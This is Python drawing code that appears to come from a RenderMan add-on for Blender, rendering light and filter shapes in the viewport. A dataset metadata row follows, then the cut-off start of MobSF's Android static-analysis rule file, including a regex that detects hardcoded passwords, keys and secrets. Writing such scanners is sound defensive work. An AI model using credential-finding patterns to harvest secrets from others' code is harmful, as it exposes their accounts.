[0.097500, -0.490300, 0.000000], [0.191300, -0.461900, 0.000000], [0.277700, -0.415700, 0.000000], [0.353500, -0.353500, 0.000000], [0.415700, -0.277700, 0.000000], [0.461900, -0.191300, 0.000000], [0.490300, -0.097500, 0.000000], [0.500000, 0.000000, 0.000000], [0.490300, 0.097500, 0.000000] ] s_distantLight = dict() s_distantLight['arrow1'] = [ (0.03316599252,-6.536167e-18,0.0294362), (0.03316599252,-7.856030e-17,0.5), (0.06810822842,-7.856030e-17,0.5), (0,-1.11022302e-16, 1.0), (-0.0681082284,-7.85603e-17,0.5), (-0.0331659925,-7.85603e-17,0.5), (-0.0331659925,-6.53616e-18,0.029436) ] s_distantLight['arrow2'] = [ (0.03316599252,-0.5,0.0294362), (0.03316599252,-0.5,0.5), (0.06810822842,-0.5,0.5), (0,-0.5, 1.0), (-0.0681082284,-0.5,0.5), (-0.0331659925,-0.5,0.5), (-0.0331659925,-0.5,0.029436) ] s_distantLight['arrow3'] = [ (0.03316599252,0.5,0.0294362), (0.03316599252,0.5,0.5), (0.06810822842,0.5,0.5), (0,0.5, 1.0), (-0.0681082284,0.5,0.5), (-0.0331659925,0.5,0.5), (-0.0331659925,0.5,0.029436) ] s_portalRays = [ (-1, 0, 0), (-2, 0, 0), (-1, 0, 0), (-1, 0, -1), (-2, 0, -2), (-1, 0, -1), ( 0, 0, -1), ( 0, 0, -2), ( 0, 0, -1), ( 1, 0, -1), ( 2, 0, -2), ( 1, 0, -1), ( 1, 0, 0), ( 2, 0, 0), ( 1, 0, 0), ( 1, 0, 1), ( 2, 0, 2), ( 1, 0, 1), ( 0, 0, 1), ( 0, 0, 2), ( 0, 0, 1), (-1, 0, 1), (-2, 0, 2), (-1, 0, 1), (-1, 0, 0) ] s_cylinderLight = dict() s_cylinderLight['vtx'] = [ [-0.5, -0.4045, -0.2938], [-0.5, -0.1545, -0.4755], [-0.5, 0.1545, -0.4755], [-0.5, 0.4045, -0.2938], [-0.5, 0.5, 0], [-0.5, 0.4045, 0.2938], [-0.5, 0.1545, 0.4755], [-0.5, -0.1545, 0.4755], [-0.5, -0.4045, 0.2938], [-0.5, -0.5, 0], [-0.5, -0.4045, -0.2938], [0.5, -0.4045, -0.2938], [0.5, -0.1545, -0.4755], [0.5, 0.1545, -0.4755], [0.5, 0.4045, -0.2938], [0.5, 0.5, 0], [0.5, 0.4045, 0.2938], [0.5, 0.1545, 0.4755], [0.5, -0.1545, 0.4755], [0.5, -0.4045, 0.2938], [0.5, -0.5, 0], [0.5, -0.4045, -0.2938] ] s_cylinderLight['indices'] = [ (0, 1), (1, 2), (2, 3), (3, 4), (4, 5), (5, 6), (6, 7), (7, 8), (8, 9), (9, 10), (11, 12), (12, 13), (13, 14), (14, 15), (15, 16), (16, 17), (17, 18), (18, 19), (19, 20), (20, 21), (0, 11), (2, 13), (4, 15), (6, 17), (8, 19) ] _SHADER_ = None if not bpy.app.background: _SHADER_ = gpu.shader.from_builtin('3D_UNIFORM_COLOR') _SELECTED_COLOR_ = (1, 1, 1) _WIRE_COLOR_ = (0, 0, 0) if 'Default' in bpy.context.preferences.themes: _SELECTED_COLOR_ = bpy.context.preferences.themes['Default'].view_3d.object_active _WIRE_COLOR_ = bpy.context.preferences.themes['Default'].view_3d.wire def set_selection_color(ob): global _SELECTED_COLOR_, _WIRE_COLOR_ if ob in bpy.context.selected_objects: col = (_SELECTED_COLOR_[0], _SELECTED_COLOR_[1], _SELECTED_COLOR_[2], 1) else: col = (_WIRE_COLOR_[0], _WIRE_COLOR_[1], _WIRE_COLOR_[2], 1) _SHADER_.uniform_float("color", col) def _get_indices(l): indices = [] for i in range(0, len(l)): if i == len(l)-1: indices.append((i, 0)) else: indices.append((i, i+1)) return indices def _get_sun_direction(ob): light = ob.data rm = light.renderman.get_light_node() m = Matrix.Identity(4) m = m @ Matrix.Rotation(math.radians(90.0), 4, 'X') month = float(rm.month) day = float(rm.day) year = float(rm.year) hour = float(rm.hour) zone = rm.zone latitude = rm.latitude longitude = rm.longitude sunDirection = Vector([rm.sunDirection[0], rm.sunDirection[1], rm.sunDirection[2]]) if month == 0.0: return sunDirection if month == 1.0: dayNumber = day elif month == 2.0: dayNumber = day + 31.0 else: year_mod = 0.0 if math.fmod(year, 4.0) != 0.0: year_mod = 0.0 elif math.fmod(year, 100.0) != 0.0: year_mod = 1.0 elif math.fmod(year, 400.0) != 0.0: year_mod = 0.0 else: year_mod = 1.0 dayNumber = math.floor(30.6 * month - 91.4) + day + 59.0 + year_mod dayAngle = 2.0 * math.pi * float(dayNumber - 81.0 + (hour - zone) / 24.0) / 365.0 timeCorrection = 4.0 * (longitude - 15.0 * zone) + 9.87 * math.sin(2.0 * dayAngle) - 7.53 * math.cos(1.0 * dayAngle) - 1.50 * math.sin(1.0 * dayAngle) hourAngle = math.radians(15.0) * (hour + timeCorrection / 60.0 - 12.0) declination = math.asin(math.sin(math.radians(23.45)) * math.sin(dayAngle)) elevation = math.asin(math.sin(declination) * math.sin(math.radians(latitude)) + math.cos(declination) * math.cos(math.radians(latitude)) * math.cos(hourAngle)) azimuth = math.acos((math.sin(declination) * math.cos(math.radians(latitude)) - math.cos(declination) * math.sin(math.radians(latitude)) * math.cos(hourAngle)) / math.cos(elevation)) if hourAngle > 0.0: azimuth = 2.0 * math.pi - azimuth sunDirection[0] = math.cos(elevation) * math.sin(azimuth) sunDirection[1] = max(math.sin(elevation), 0) sunDirection[2] = math.cos(elevation) * math.cos(azimuth) return m @ sunDirection def make_sphere(m): lats = 12 longs = 20 radius = 0.5 v = [] i = 0 j = 0 for j in range(0, longs+1): lng = 2 * math.pi * float (j / longs) x = math.cos(lng) y = math.sin(lng) for i in range(0, lats+1): lat0 = math.pi * (-0.5 + float(i/ lats)) z0 = math.sin(lat0) * radius zr0 = math.cos(lat0) * radius v.append( m @ Vector((x*zr0, y*zr0, z0))) for i in range(0, lats+1): lat0 = math.pi * (-0.5 + float(i / lats)) z0 = math.sin(lat0) * radius zr0 = math.cos(lat0) * radius v.append( m @ Vector((-x*zr0, -y*zr0, z0))) for i in range(0, lats+1): lat0 = math.pi * (-0.5 + float(i / lats)) z0 = math.sin(lat0) * radius zr0 = math.cos(lat0) * radius for j in range(0, longs+1): lng = 2 * math.pi * (float(j / longs)) x = math.cos(lng) y = math.sin(lng) v.append( m @ Vector((x*zr0, y*zr0, z0))) return v def draw_rect_light(ob): _SHADER_.bind() set_selection_color(ob) ob_matrix = Matrix(ob.matrix_world) m = ob_matrix @ Matrix.Rotation(math.radians(180.0), 4, 'Y') box = [] for pt in s_rmanLightLogo['box']: box.append( m @ Vector(pt)) box_indices = _get_indices(s_rmanLightLogo['box']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": box}, indices=box_indices) batch.draw(_SHADER_) arrow = [] for pt in s_rmanLightLogo['arrow']: arrow.append( m @ Vector(pt)) arrow_indices = _get_indices(s_rmanLightLogo['arrow']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": arrow}, indices=arrow_indices) batch.draw(_SHADER_) m = ob_matrix R_outside = [] for pt in s_rmanLightLogo['R_outside']: R_outside.append( m @ Vector(pt)) R_outside_indices = _get_indices(s_rmanLightLogo['R_outside']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_outside}, indices=R_outside_indices) batch.draw(_SHADER_) R_inside = [] for pt in s_rmanLightLogo['R_inside']: R_inside.append( m @ Vector(pt)) R_inside_indices = _get_indices(s_rmanLightLogo['R_inside']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_inside}, indices=R_inside_indices) batch.draw(_SHADER_) def draw_sphere_light(ob): _SHADER_.bind() set_selection_color(ob) ob_matrix = Matrix(ob.matrix_world) m = ob_matrix @ Matrix.Rotation(math.radians(180.0), 4, 'Y') disk = [] for pt in s_diskLight: disk.append( m @ Vector(pt) ) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) m2 = m @ Matrix.Rotation(math.radians(90.0), 4, 'Y') disk = [] for pt in s_diskLight: disk.append( m2 @ Vector(pt)) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) m3 = m @ Matrix.Rotation(math.radians(90.0), 4, 'X') disk = [] for pt in s_diskLight: disk.append( m3 @ Vector(pt)) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) m = ob_matrix R_outside = [] for pt in s_rmanLightLogo['R_outside']: R_outside.append( m @ Vector(pt)) R_outside_indices = _get_indices(s_rmanLightLogo['R_outside']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_outside}, indices=R_outside_indices) batch.draw(_SHADER_) R_inside = [] for pt in s_rmanLightLogo['R_inside']: R_inside.append( m @ Vector(pt)) R_inside_indices = _get_indices(s_rmanLightLogo['R_inside']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_inside}, indices=R_inside_indices) batch.draw(_SHADER_) def draw_envday_light(ob): _SHADER_.bind() set_selection_color(ob) loc, rot, sca = Matrix(ob.matrix_world).decompose() axis,angle = rot.to_axis_angle() scale = max(sca) # take the max axis m = Matrix.Translation(loc) m = m @ Matrix.Rotation(angle, 4, axis) m = m @ Matrix.Scale(scale, 4) ob_matrix = m m = Matrix(ob_matrix) m = m @ Matrix.Rotation(math.radians(90.0), 4, 'X') west_rr_shape = [] for pt in s_envday['west_rr_shape']: west_rr_shape.append( m @ Vector(pt)) west_rr_indices = _get_indices(s_envday['west_rr_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": west_rr_shape}, indices=west_rr_indices) batch.draw(_SHADER_) east_rr_shape = [] for pt in s_envday['east_rr_shape']: east_rr_shape.append( m @ Vector(pt)) east_rr_indices = _get_indices(s_envday['east_rr_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": east_rr_shape}, indices=east_rr_indices) batch.draw(_SHADER_) south_rr_shape = [] for pt in s_envday['south_rr_shape']: south_rr_shape.append( m @ Vector(pt)) south_rr_indices = _get_indices(s_envday['south_rr_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": south_rr_shape}, indices=south_rr_indices) batch.draw(_SHADER_) north_rr_shape = [] for pt in s_envday['north_rr_shape']: north_rr_shape.append( m @ Vector(pt) ) north_rr_indices = _get_indices(s_envday['north_rr_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": north_rr_shape}, indices=north_rr_indices) batch.draw(_SHADER_) inner_circle_rr_shape = [] for pt in s_envday['inner_circle_rr_shape']: inner_circle_rr_shape.append( m @ Vector(pt) ) inner_circle_rr_shape_indices = _get_indices(s_envday['inner_circle_rr_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": inner_circle_rr_shape}, indices=inner_circle_rr_shape_indices) batch.draw(_SHADER_) outer_circle_rr_shape = [] for pt in s_envday['outer_circle_rr_shape']: outer_circle_rr_shape.append( m @ Vector(pt) ) outer_circle_rr_shape_indices = _get_indices(s_envday['outer_circle_rr_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": outer_circle_rr_shape}, indices=outer_circle_rr_shape_indices) batch.draw(_SHADER_) compass_shape = [] for pt in s_envday['compass_shape']: compass_shape.append( m @ Vector(pt)) compass_shape_indices = _get_indices(s_envday['compass_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": compass_shape}, indices=compass_shape_indices) batch.draw(_SHADER_) east_arrow_shape = [] for pt in s_envday['east_arrow_shape']: east_arrow_shape.append( m @ Vector(pt)) east_arrow_shape_indices = _get_indices(s_envday['east_arrow_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": east_arrow_shape}, indices=east_arrow_shape_indices) batch.draw(_SHADER_) west_arrow_shape = [] for pt in s_envday['west_arrow_shape']: west_arrow_shape.append( m @ Vector(pt) ) west_arrow_shape_indices = _get_indices(s_envday['west_arrow_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": west_arrow_shape}, indices=west_arrow_shape_indices) batch.draw(_SHADER_) north_arrow_shape = [] for pt in s_envday['north_arrow_shape']: north_arrow_shape.append( m @ Vector(pt)) north_arrow_shape_indices = _get_indices(s_envday['north_arrow_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": north_arrow_shape}, indices=north_arrow_shape_indices) batch.draw(_SHADER_) south_arrow_shape = [] for pt in s_envday['south_arrow_shape']: south_arrow_shape.append( m @ Vector(pt)) south_arrow_shape_indices = _get_indices(s_envday['south_arrow_shape']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": south_arrow_shape}, indices=south_arrow_shape_indices) batch.draw(_SHADER_) sunDirection = _get_sun_direction(ob) sunDirection = Matrix(ob_matrix) @ Vector(sunDirection) origin = Matrix(ob_matrix) @ Vector([0,0,0]) sunDirection_pts = [ origin, sunDirection] batch = batch_for_shader(_SHADER_, 'LINES', {"pos": sunDirection_pts}, indices=[(0,1)]) batch.draw(_SHADER_) # draw a sphere to represent the sun v = sunDirection - origin translate = Matrix.Translation(v) sphere = make_sphere(ob_matrix @ Matrix.Scale(0.25, 4)) sphere_indices = [] for i in range(0, len(sphere)): if i == len(sphere)-1: sphere_indices.append((i, 0)) else: sphere_indices.append((i, i+1)) sphere_shape = [] for pt in sphere: sphere_shape.append( translate @ Vector(pt) ) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": sphere_shape}, indices=sphere_indices) batch.draw(_SHADER_) def draw_disk_light(ob): _SHADER_.bind() set_selection_color(ob) ob_matrix = Matrix(ob.matrix_world) m = ob_matrix @ Matrix.Rotation(math.radians(180.0), 4, 'Y') disk = [] for pt in s_diskLight: disk.append( m @ Vector(pt)) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) arrow = [] for pt in s_rmanLightLogo['arrow']: arrow.append( m @ Vector(pt)) arrow_indices = _get_indices(s_rmanLightLogo['arrow']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": arrow}, indices=arrow_indices) batch.draw(_SHADER_) m = ob_matrix R_outside = [] for pt in s_rmanLightLogo['R_outside']: R_outside.append( m @ Vector(pt)) R_outside_indices = _get_indices(s_rmanLightLogo['R_outside']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_outside}, indices=R_outside_indices) batch.draw(_SHADER_) R_inside = [] for pt in s_rmanLightLogo['R_inside']: R_inside.append( m @ Vector(pt)) R_inside_indices = _get_indices(s_rmanLightLogo['R_inside']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_inside}, indices=R_inside_indices) batch.draw(_SHADER_) def draw_dist_light(ob): _SHADER_.bind() set_selection_color(ob) ob_matrix = Matrix(ob.matrix_world) m = ob_matrix @ Matrix.Rotation(math.radians(180.0), 4, 'Y') arrow1 = [] for pt in s_distantLight['arrow1']: arrow1.append( m @ Vector(pt) ) arrow1_indices = _get_indices(s_distantLight['arrow1']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": arrow1}, indices=arrow1_indices) batch.draw(_SHADER_) arrow2 = [] for pt in s_distantLight['arrow2']: arrow2.append( m @ Vector(pt)) arrow2_indices = _get_indices(s_distantLight['arrow2']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": arrow2}, indices=arrow2_indices) batch.draw(_SHADER_) arrow3 = [] for pt in s_distantLight['arrow3']: arrow3.append( m @ Vector(pt) ) arrow3_indices = _get_indices(s_distantLight['arrow3']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": arrow3}, indices=arrow3_indices) batch.draw(_SHADER_) m = ob_matrix R_outside = [] for pt in s_rmanLightLogo['R_outside']: R_outside.append( m @ Vector(pt) ) R_outside_indices = _get_indices(s_rmanLightLogo['R_outside']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_outside}, indices=R_outside_indices) batch.draw(_SHADER_) R_inside = [] for pt in s_rmanLightLogo['R_inside']: R_inside.append( m @ Vector(pt) ) R_inside_indices = _get_indices(s_rmanLightLogo['R_inside']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_inside}, indices=R_inside_indices) batch.draw(_SHADER_) def draw_portal_light(ob): _SHADER_.bind() set_selection_color(ob) ob_matrix = Matrix(ob.matrix_world) m = ob_matrix R_outside = [] for pt in s_rmanLightLogo['R_outside']: R_outside.append( m @ Vector(pt) ) R_outside_indices = _get_indices(s_rmanLightLogo['R_outside']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_outside}, indices=R_outside_indices) batch.draw(_SHADER_) R_inside = [] for pt in s_rmanLightLogo['R_inside']: R_inside.append( m @ Vector(pt)) R_inside_indices = _get_indices(s_rmanLightLogo['R_inside']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": R_inside}, indices=R_inside_indices) batch.draw(_SHADER_) m = ob_matrix @ Matrix.Rotation(math.radians(90.0), 4, 'X') m = m @ Matrix.Scale(0.5, 4) rays = [] for pt in s_portalRays: rays.append( m @ Vector(pt) ) rays_indices = _get_indices(s_portalRays) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": rays}, indices=rays_indices) batch.draw(_SHADER_) def draw_dome_light(ob): _SHADER_.bind() set_selection_color(ob) loc, rot, sca = Matrix(ob.matrix_world).decompose() axis,angle = rot.to_axis_angle() m = Matrix.Rotation(angle, 4, axis) m = m @ Matrix.Scale(100, 4) sphere = make_sphere(m) sphere_indices = [] for i in range(0, len(sphere)): if i == len(sphere)-1: sphere_indices.append((i, 0)) else: sphere_indices.append((i, i+1)) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": sphere}, indices=sphere_indices) batch.draw(_SHADER_) def draw_cylinder_light(ob): _SHADER_.bind() set_selection_color(ob) m = Matrix(ob.matrix_world) cylinder = [] for pt in s_cylinderLight['vtx']: cylinder.append( m @ Vector(pt)) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": cylinder}, indices=s_cylinderLight['indices']) batch.draw(_SHADER_) def draw_arc(a, b, numSteps, quadrant, xOffset, yOffset, pts): stepAngle = float(_PI0_5_ / numSteps) for i in range(0, numSteps): angle = stepAngle*i + quadrant*_PI0_5_ x = a * math.cos(angle) y = b * math.sin(angle) pts.append(Vector([x+xOffset, y+yOffset, 0.0])) #pts.append(Vector([x+xOffset, 0.0, y+yOffset])) def draw_rounded_rectangles( left, right, top, bottom, radius, leftEdge, rightEdge, topEdge, bottomEdge, zOffset1, zOffset2, m): pts = [] a = radius+rightEdge b = radius+topEdge draw_arc(a, b, 10, 0, right, top, pts) a = radius+leftEdge b = radius+topEdge draw_arc(a, b, 10, 1, -left, top, pts) a = radius+leftEdge b = radius+bottomEdge draw_arc(a, b, 10, 2, -left, -bottom, pts) a = radius+rightEdge b = radius+bottomEdge draw_arc(a, b, 10, 3, right, -bottom, pts) translate = m #Matrix.Translation( Vector([0,0, zOffset1])) @ m shape_pts = [] for pt in pts: shape_pts.append( translate @ Vector(pt)) shape_pts_indices = _get_indices(shape_pts) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": shape_pts}, indices=shape_pts_indices) batch.draw(_SHADER_) shape_pts = [] translate = m #Matrix.Translation( Vector([0,0, zOffset2])) @ m for pt in pts: shape_pts.append( translate @ Vector(pt) ) shape_pts_indices = _get_indices(shape_pts) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": shape_pts}, indices=shape_pts_indices) batch.draw(_SHADER_) def draw_rod(leftEdge, rightEdge, topEdge, bottomEdge, frontEdge, backEdge, scale, width, radius, left, right, top, bottom, front, back, world_mat): leftEdge *= scale rightEdge *= scale topEdge *= scale backEdge *= scale frontEdge *= scale bottomEdge *= scale m = world_mat # front and back draw_rounded_rectangles(left, right, top, bottom, radius, leftEdge, rightEdge, topEdge, bottomEdge, front, -back, m) m = world_mat @ Matrix.Rotation(math.radians(-90.0), 4, 'X') # top and bottom draw_rounded_rectangles(left, right, back, front, radius, leftEdge, rightEdge, backEdge, frontEdge, top, -bottom, m) m = world_mat @ Matrix.Rotation(math.radians(90.0), 4, 'Y') # left and right draw_rounded_rectangles(front, back, top, bottom, radius, frontEdge, backEdge, topEdge, bottomEdge, -left, right, m) def draw_rod_light_filter(ob): _SHADER_.bind() set_selection_color(ob) m = Matrix(ob.matrix_world) m = m @ Matrix.Rotation(math.radians(90.0), 4, 'X') m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Y') #m = m @ Matrix.Rotation(math.radians(180.0), 4, 'Y') #m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Z') light = ob.data rm = light.renderman.get_light_node() edge = rm.edge width = rm.width depth = rm.depth height = rm.height radius = rm.radius left_edge = edge right_edge = edge top_edge = edge bottom_edge = edge front_edge = edge back_edge = edge left = 0.0 right = 0.0 top = 0.0 bottom = 0.0 front = 0.0 back = 0.0 scale_width = 1.0 scale_height = 1.0 scale_depth = 1.0 rod_scale = 0.0 if light.renderman.get_light_node_name() == 'PxrRodLightFilter': left_edge *= rm.leftEdge right_edge *= rm.rightEdge top_edge *= rm.topEdge bottom_edge *= rm.bottomEdge front_edge *= rm.frontEdge back_edge *= rm.backEdge scale_width *= rm.scaleWidth scale_height *= rm.scaleHeight scale_depth *= rm.scaleDepth left = rm.left right = rm.right top = rm.top bottom = rm.bottom front = rm.front back = rm.back left += scale_width * width right += scale_width * width top += scale_height * height bottom += scale_height * height front += scale_depth * depth back += scale_depth * depth draw_rod(left_edge, right_edge, top_edge, bottom_edge, front_edge, back_edge, rod_scale, width, radius, left, right, top, bottom, front, back, m) if edge > 0.0: # draw outside box rod_scale = 1.0 draw_rod(left_edge, right_edge, top_edge, bottom_edge, front_edge, back_edge, rod_scale, width, radius, left, right, top, bottom, front, back, m) def draw_ramp_light_filter(ob): _SHADER_.bind() set_selection_color(ob) light = ob.data rm = light.renderman.get_light_node() rampType = int(rm.rampType) begin = float(rm.beginDist) end = float(rm.endDist) # distToLight if rampType in (0,2): _SHADER_.bind() set_selection_color(ob) m = Matrix(ob.matrix_world) m = m @ Matrix.Rotation(math.radians(180.0), 4, 'Y') m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Z') # begin begin_m = m @ Matrix.Scale(begin, 4) disk = [] for pt in s_diskLight: disk.append( begin_m @ Vector(pt) ) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) m2 = begin_m @ Matrix.Rotation(math.radians(90.0), 4, 'Y') disk = [] for pt in s_diskLight: disk.append( m2 @ Vector(pt)) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) m3 = begin_m @ Matrix.Rotation(math.radians(90.0), 4, 'X') disk = [] for pt in s_diskLight: disk.append( m3 @ Vector(pt)) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) # end end_m = m @ Matrix.Scale(end, 4) disk = [] for pt in s_diskLight: disk.append( end_m @ Vector(pt)) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) m2 = end_m @ Matrix.Rotation(math.radians(90.0), 4, 'Y') disk = [] for pt in s_diskLight: disk.append( m2 @ Vector(pt)) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) m3 = end_m @ Matrix.Rotation(math.radians(90.0), 4, 'X') disk = [] for pt in s_diskLight: disk.append( m3 @ Vector(pt)) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) # linear elif rampType == 1: m = Matrix(ob.matrix_world) m = m @ Matrix.Rotation(math.radians(180.0), 4, 'Y') m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Z') box = [] for pt in s_rmanLightLogo['box']: box.append( m @ Vector(pt)) n = mathutils.geometry.normal(box) n.normalize() box1 = [] for i,pt in enumerate(box): if begin > 0.0: box1.append(pt + (begin * n)) else: box1.append(pt) box_indices = _get_indices(s_rmanLightLogo['box']) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": box1}, indices=box_indices) batch.draw(_SHADER_) box2 = [] for pt in box: box2.append( pt + (end * n) ) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": box2}, indices=box_indices) batch.draw(_SHADER_) # radial elif rampType == 3: _SHADER_.bind() set_selection_color(ob) m = Matrix(ob.matrix_world) m = m @ Matrix.Rotation(math.radians(180.0), 4, 'Y') m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Z') if begin > 0.0: m1 = m @ Matrix.Scale(begin, 4) disk = [] for pt in s_diskLight: disk.append( m1 @ Vector(pt) ) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) m2 = m @ Matrix.Scale(end, 4) disk = [] for pt in s_diskLight: disk.append( m2 @ Vector(pt)) disk_indices = _get_indices(s_diskLight) batch = batch_for_shader(_SHADER_, 'LINES', {"pos": disk}, indices=disk_indices) batch.draw(_SHADER_) else: pass def draw_barn_light_filter(ob): global _BARN_LIGHT_DRAW_HELPER_ _SHADER_.bind() m = Matrix(ob.matrix_world) m = m @ Matrix.Rotation(math.radians(180.0), 4, 'Y') #m = m @ Matrix.Rotation(math.radians(90.0), 4, 'Z') set_selection_color(ob) if not _BARN_LIGHT_DRAW_HELPER_: _BARN_LIGHT_DRAW_HELPER_ = BarnLightFilterDrawHelper() _BARN_LIGHT_DRAW_HELPER_.update_input_params(ob) vtx_buffer = _BARN_LIGHT_DRAW_HELPER_.vtx_buffer() pts = [] for pt in vtx_buffer: pts.append( m @ Vector(pt)) indices = _BARN_LIGHT_DRAW_HELPER_.idx_buffer(len(pt), 0, 0) # blender wants a list of lists indices = [indices[i:i+2] for i in range(0, len(indices), 2)] batch = batch_for_shader(_SHADER_, 'LINES', {"pos": pts}, indices=indices) batch.draw(_SHADER_) def draw(): if bpy.context.engine != 'PRMAN_RENDER': return scene = bpy.context.scene for ob in [x for x in scene.objects if x.type == 'LIGHT']: if ob.hide_get(): continue if not ob.data.renderman: continue rm = ob.data.renderman if not rm.use_renderman_node: continue light_shader = rm.get_light_node() if not light_shader: continue # check the local view for this light if not ob.visible_in_viewport_get(bpy.context.space_data): continue light_shader_name = rm.get_light_node_name() if light_shader_name == '': return if light_shader_name in RMAN_AREA_LIGHT_TYPES: if ob.data.type != 'AREA': if hasattr(ob.data, 'size'): ob.data.size = 0.0 ob.data.type = 'AREA' elif ob.data.type != 'POINT': if hasattr(ob.data, 'size'): ob.data.size = 0.0 ob.data.type = 'POINT' if light_shader_name == 'PxrSphereLight': draw_sphere_light(ob) elif light_shader_name == 'PxrEnvDayLight': draw_envday_light(ob) elif light_shader_name == 'PxrDiskLight': draw_disk_light(ob) elif light_shader_name == 'PxrDistantLight': draw_dist_light(ob) elif light_shader_name == 'PxrPortalLight': draw_portal_light(ob) elif light_shader_name == 'PxrDomeLight': draw_dome_light(ob) elif light_shader_name == 'PxrCylinderLight': draw_cylinder_light(ob) elif light_shader_name in ['PxrGoboLightFilter', 'PxrCookieLightFilter', 'PxrRectLight']: draw_rect_light(ob) elif light_shader_name in ['PxrRodLightFilter', 'PxrBlockerLightFilter']: draw_rod_light_filter(ob) elif light_shader_name == 'PxrRampLightFilter': draw_ramp_light_filter(ob) elif light_shader_name == 'PxrBarnLightFilter': # get all lights that the barn is attached to draw_barn_light_filter(ob) else: draw_sphere_light(ob) def register(): global _DRAW_HANDLER_ _DRAW_HANDLER_ = bpy.types.SpaceView3D.draw_handler_add(draw, (), 'WINDOW', 'POST_VIEW') def unregister(): global _DRAW_HANDLER_ if _DRAW_HANDLER_: bpy.types.SpaceView3D.draw_handler_remove(_DRAW_HANDLER_, 'WINDOW')
mit
8,597,294,281,433,653,000
30.923304
186
0.543777
false
2.626221
false
false
false
ajinabraham/Mobile-Security-Framework-MobSF
StaticAnalyzer/views/android/android_rules.py
1
19226
""" Rule Format 1. desc - Description of the findings 2. type a. string b. regex 3. match a. single_regex - if re.findall(regex1, input) b .regex_and - if re.findall(regex1, input) and re.findall(regex2, input) c. regex_or - if re.findall(regex1, input) or re.findall(regex2, input) d. regex_and_perm - if re.findall(regex, input) and (permission in permission_list_from_manifest) e. single_string - if string1 in input f. string_and - if (string1 in input) and (string2 in input) g. string_or - if (string1 in input) or (string2 in input) h. string_and_or - if (string1 in input) and ((string_or1 in input) or (string_or2 in input)) i. string_or_and - if (string1 in input) or ((string_and1 in input) and (string_and2 in input)) j. string_and_perm - if (string1 in input) and (permission in permission_list_from_manifest) k. string_or_and_perm - if ((string1 in input) or (string2 in input)) and (permission in permission_list_from_manifest) 4. level a. high b. warning c. info d. good 5. input_case a. upper b. lower c. exact 6. others a. string<no> - string1, string2, string3, string_or1, string_and1 b. regex<no> - regex1, regex2, regex3 c. perm - Permission """ RULES = [ { 'desc': 'Files may contain hardcoded sensitive informations like usernames, passwords, keys etc.', 'type': 'regex', 'regex1': r'''(password\s*=\s*['|"].+['|"]\s{0,5})|(pass\s*=\s*['|"].+['|"]\s{0,5})|(username\s*=\s*['|"].+['|"]\s{0,5})|(secret\s*=\s*['|"].+['|"]\s{0,5})|(key\s*=\s*['|"].+['|"]\s{0,5})''', 'level': 'high', 'match': 'single_regex', 'input_case': 'lower', 'cvss': 7.4, 'cwe': 'CWE-312' }, { 'desc': 'IP Address disclosure', 'type': 'regex', 'regex1': 